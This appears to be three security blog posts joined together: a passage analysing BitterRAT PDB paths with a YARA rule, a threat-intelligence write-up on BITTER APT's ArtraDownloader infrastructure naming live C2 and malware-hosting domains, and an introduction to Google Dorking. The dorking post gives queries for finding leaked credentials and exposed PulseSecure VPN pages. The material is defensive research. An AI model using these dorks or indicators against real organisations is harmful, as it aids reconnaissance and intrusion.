The data contained within the URI is encoded by adding to each byte within the string. By subtracting one from each byte, you are able to decode the data, which reveals that it is a unique identifier and the compromised machine’s hostname. This is the same encoding technique I observed in my earlier post regarding ArtraDownloader.

Another interesting find is that both binaries contain PDB (Program Database) file strings. Program database files are generated when a file is compiled and contain debugging information about an individual build of a program, and can give us some unique insight into how these attackers build and store their malware. FireEye released a great article describing the importance of PDB’s, which can be found here.

Shown below: PDB string found in the two BitterRAT binaries

C:\Users\Asterix\Documents\Visual Studio 2008\Projects\25July2019DN\Release\25July2019DN.pdb

Within this fully qualified PDB path, I see several things of note. A username (Asterix), a project folder (25July2019DN), and the .pdb file itself (25July2019DN.pdb). From this, I can deduce that the creator of both of these binaries was (atleast at this stage in compilation) named Asterix, and that it was being worked on around the 25th of July 2019. Both files metadata reveal final compilation dates of July 25th 2019 04:55:52 for the first binary, and August 31st 2019 09:14:04 for the second binary. It is also interesting to see how these actors work on their malware in a structured way as any programmer might.

Now that I was able to obtain the PDB string from these files, I can perform searches for similar files via VirusTotal’s “RetroHunt” service (requires a paid subscription) or Hybrid-Analysis’s advanced Yara search (free for a limited amount of results). In either case, I must first create a Yara rule to search for the PDB string. For this, I will only use the “C:\Users\Asterix" portion of the PDB string, as I want to see what other files this user has authored.

rule BITTER_RAT_PDB_STRING{
 strings:
   $a1 = "C:\\Users\\Asterix" nocase
 condition:
   $a1
}

Shown above: A very basic example of a Yara rule

This search on Hybrid-Analysis returns 180 samples containing this string, 11 of which are available to view for free and 169 which require a paid subscription. Of the samples available for free, a majority of them are tagged “Hangover”, indicating the APT group that goes by that name (according to MITRE, it is believed that the actors behind Patchwork APT are the same actors behind Hangover). Interestingly, they share several commonalities with the BITTER APT group - those being they both are believed to have a goal of espionage, both were first observed in late 2015, and both are believed to be pro-Indian or made up of Indian entities. I could not find any information online suggesting that Patchwork/Hangover may also be the same entity as BITTER, but it does show an interesting overlap in TTPs (Tactics, Techniques, & Procedures) and possible motives.

Regardless, the earliest file creation date I am able to see from the free samples available matching that .PDB string is February 2nd 2018, indicating that the user “Asterix” has been involved in BITTER/Patchwork/Hangover operations for some time. Based on the stolen certificate used for the first binary, I would extrapolate that the aforementioned files were used in attacks against Pakistani organizations, however I do not have further evidence at this time to confirm target attribution.

Indicators

References/Further Reading

1. https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html
2. https://twitter.com/RedDrip7/status/1170988245561294850
3. https://attack.mitre.org/groups/G0040/

Summary

BITTER, an APT group which has been active since 2015, has been observed ramping up their activity lately. In this post, I will review recent infrastructure that is actively being used by this APT, which is suspected of being used to carry out attacks against Pakistani organizations.

Analysis

The BITTER APT group has notably been observed targeting Chinese and Pakistani interests in the past, and is suspected of being belonging to a country in South Asia. Recent reports from QiAnXin Technology’s “RedDrip” team, a Chinese security vendor, suggest that the BITTER APT group is actively launching attacks targeting Pakistani organizations. According to this Tweet, they are seeing malicious documents causing users to download payloads from maq.com.pk/wehs, which looks to be ArtraDownloader. ArtraDownloader is a Trojan Downloader that was discovered by PaloAlto’s UNIT42, and has also been observed downloading BitterRAT Remote Access Trojan, both of which have been associated with BITTER APT groups operations.

Researching for activity related to ArtraDownloader on App.Any.Run reveals numerous examples of malicious Microsoft Word documents exploiting the CVE-2017-11882 vulnerability to download an executable payload from the aforementioned URL identified by RedDrip (maq.com.pk). CVE-2017-11882, which was patched by Microsoft in November of 2017, is a memory corruption vulnerability which grants the attacker RCE (remote code execution) upon the user opening a specially crafted file (see here for the Microsoft advisory). These Any.Run analyses indicate that, after exploitation and download of the ArtraDownloader from maq.com.pk, there is Command & Control activity beaconing to the URL onlinejohnline99.org/kvs06v.php.

Shown above: App.Any.Run samples of ArtraDownloader

Pivoting off of Any.Run and into VirusTotal we can see that onlinejohnline99.org appears to be the Command & Control for several binaries, which are actively being distributed from several undiscovered domains. We already know about maq.com.pk, however because of VirusTotal’s relational graphing abilities, we are able to see that these binaries are also being served from biocons.pk, gandharaart.org, and sartetextile.com. One thing of interest, however notable, is all of the domains delivering these binaries are hosted by the same ISP (COMSATS, a Pakistani ISP). Digging deeper into the IP addresses hosting these domains (203.124.44.31, 203.124.44.66, 203.124.44.93, and 203.124.43.227) revealed that they were only hosting a very limited amount of domains, many of which appeared to be very suspect in naming convention or content. While these were suspicious, I could not directly relate them to BITTER APT activity at this time.

Shown above: VirusTotal Graph of this campaign’s infrastructure

Analysis of the discovered binaries confirm them to be ArtraDownloader samples, with variations in naming and hash values (such as intelx.exe, lsasw.exe, advrt.exe, wehs.exe, reportstableregular.doc.exe, and more). I won’t go into details surrounding the actual analysis of the malware samples as PaloAlto’s UNIT42 has already gone over this at length in their article found here and the binaries I reviewed do not appear to differ significantly from what was described in their write-up. All of the samples I reviewed utilized onlinejohnline99.org as their primary Command & Control infrastructure, with the exception of one sample which instead beaconed to the domain advas.zhongwenchuantongqiye.com, which was documented as being related to BITTER operations targeting the Chinese government in May of 2019 by 360-CERT.

The Command & Control communications are typical for what we would see from ArtraDownloader, with all of the samples performing HTTP POST requests to their respective Command & Control domains with differing .php URI structures.

Shown above: Packet capture of ArtraDownloader C2  

Various strings within these samples are obfuscated by adding or subtracting from each byte within a string, and the data being POST’d to these C2 servers is no exception. In order to decode this data, you can use the following Python script provided by UNIT42 in their analysis of the downloader.

def decode(data):
    out = ""
    for d in data:
        out += chr(ord(d)-1)
    return out

print(decode("your obfuscated data here"))

Once you have deobfuscated the data, you’ll quickly see that it contains the typical identifying information that is obtained during initial infections, such as hostname, Windows version, username, unique identifier, and a Boolean value indicating if the second stage payload was downloaded and executed successfully.

During my analysis, I was unable to obtain a second stage payload to further examine the BITTER APT infrastructure. However the additional payload would likely have been the BitterRAT Remote Access Trojan, which is routinely distributed by ArtraDownloader variants. Once installed, the BITTER actors could then pivot and perform various other action on objectives. At this time, the motives of this group is unknown, however it is likely that this campaign is in pursuit of some form of espionage due to the reports of them being backed by a south Asian country (some reports indicate India). Based on much of the infrastructure observed being hosted in Pakistan, I would agree with the initial suspicion that Pakistan is being targeted in these attacks. This would also further reaffirm the possible Indian attribution to BITTER APT, due to the long-running unrest regarding the Kashmir territorial conflict between India and Pakistan over the Kashmir region.

Indicators

References/Further Reading

1. https://en.wikipedia.org/wiki/Kashmir_conflict
2. https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/
3. https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations
4. https://cert.360.cn/report/detail?id=137867e159331b7a968aa45050502d13
5. https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/
6. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
7. https://twitter.com/RedDrip7/status/1164855381052416002

Google Dorking sometimes referred to as “Google Hacking” can be a very useful resource for security analysts, penetration testers, threat researchers, and those with… less than helpful intentions.

The average user is familiar with Google - after all it is the most widely used search engine, with over 90% market share and over 5 billion searches every day. However, typical Google searches consist of entering basic terms or questions into the search bar - such as “taco recipes” or “why isn’t 11 pronounced onety-one?”. These differ from Google Dorking, which takes advantage of “Advanced Operators”. An Advanced Operator is a special character or command that helps extend the capability of normal searches, thus forcing searches to return more specific or restricted results. For example, if I were to trying to find a very specific article published on cnn.com regarding gummy bears, and tried searching for cnn gummy bears, over 316k results would be returned.

However, if I were to utilize Advanced Operators in my query, and instead search for site:cnn.com intitle:"gummy bears" only 2 results are returned

Where this becomes dangerous is when Google indexes, caches, and makes searchable, data that is sensitive. Google and other search engines are constantly crawling, indexing, and caching the internet. And while most of the data indexed/cached was meant for public viewing, some of it was unintentionally left “accessible” to these search engines. As a result, there are treasure troves of data out there that was indexed/cached by these search engines (including confidential information, passwords, files, and more), but require more specific search terms to find. In fact, this feature has been utilized so often by malicious actors that the FBI released a warning about the risks associated with Google Dorking in 2014 (found here).

Now, you may be thinking “that’s great and all, but how can I actually use this in my job?” Great question! As someone who has defended networks and hunted for threats, I’ve had to use Google Dorking in many different ways - for example, if I wanted to search for compromised credentials that were uploaded to a Pastebin dump, I would use the search site:pastebin.com "@[myDomain].com". You could even go a step further, and create a Google Alert to send you email notifications any time a new result is found for that search.

Or, if I wanted to find out if the company I am doing a penetration test for used PulseSecure VPN (which was recently identified as having a high severity arbitrary file reading vulnerability - CVE-2019-11510) then I could do a Google search for inurl:/dana-na/ filetype:cgi companyName and see if the login page for PulseSecure VPN was cached by Google for that company.

In closing, there are a plethora of different ways you could use Google Dorking to find vulnerabilities, confidential information, and more. Fortunately for us, Exploit-DB.com maintains a database of Google Dorking searches and their use-cases, aptly named Google Hacking Database, which I highly recommend checking out. Experiment with different Advanced Operators (I included a table below) and see what you can find!

Google Search Advanced Operator Table taken from Wikipedia

References/Further Reading

1. https://en.wikipedia.org/wiki/Google_hacking
2. https://www.exploit-db.com/exploits/47297
3. https://info.publicintelligence.net/DHS-FBI-NCTC-GoogleDorking.pdf
4. https://en.wikipedia.org/wiki/Web_crawler
5. https://nvd.nist.gov/vuln/detail/CVE-2019-11510